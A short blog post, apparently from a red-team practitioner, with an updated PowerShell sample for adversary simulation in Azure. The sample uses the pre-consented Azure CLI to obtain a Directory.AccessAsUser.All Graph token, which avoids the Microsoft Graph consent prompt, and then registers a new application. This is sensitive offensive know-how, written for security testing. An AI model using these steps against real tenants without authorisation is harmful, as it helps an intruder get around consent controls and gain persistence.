Updated: Adversary Simulation using Azure CLI and Microsoft Graph PowerShell

At one point last year prior to things like GraphRunner coming out, operations to interact with Microsoft Graph PowerShell was a common vector of registering internal application registrations in Azure if the GUI was not available from a low privileged foothold perspective. One common side step to granting consent to an application when connecting to MS Graph powershell was logging into the Azure CLI first (since it is a pre-consented application) and then connecting to Microsoft graph with an access token scope with Directory.AccessAsUser.All

Directly connecting to Microsoft Graph PowerShell results in asking to grant consent. We obviously do not want that.

Late last year an Azure CLI flaw was fixed where leaked credentials in logs.

Microsoft fixes critical Azure CLI flaw that leaked credentials in logs

At some point outside of the Azure CLI Connect-MgGraph now requires access tokens to be passed using a secure string instead of just writing your access token to a variable and passing the token into plain text such as Microsoft graph.

The original article on how to do this and bypass consent is located here:

Avoiding Consent to MS Graph PowerShell with Azure CLI: A Step Towards Simpler Operations and…

If you need an updated code sample I have provided one below for this type of adversary simulation when it comes to registering applications. (Bring your own scopes)

Updated Code Sample:

# Only needed when refresh token is not present. This will bypass the need to Consent MS graph application, as Azure CLI is pre-consented application
az login --allow-no-subscription
 
# Get the best possible scope that works generally with most Graph Operations. Ensure that the logged-in user is limited to read-only AAD role, to ensure no write operations are possible (The scope allows write permissions)
$graphAccessUserAsAll = az account get-access-token --scope="https://graph.microsoft.com/Directory.AccessAsUser.All" | ConvertFrom-Json

# Converting to secure strings is required
$securePassword = ConvertTo-SecureString -String $graphAccessUserAsAll.accessToken -AsPlainText -Force
 
# Connect to MS Graph using the token
Connect-MgGraph -AccessToken $securePassword

 # Run a command to verify the connection
Get-MgApplication
 
# Example of a write operation
New-MgApplication -DisplayName "CreatedByGraphSDK with Azure CLI ClientID"

Happy Cloud hacking everyone.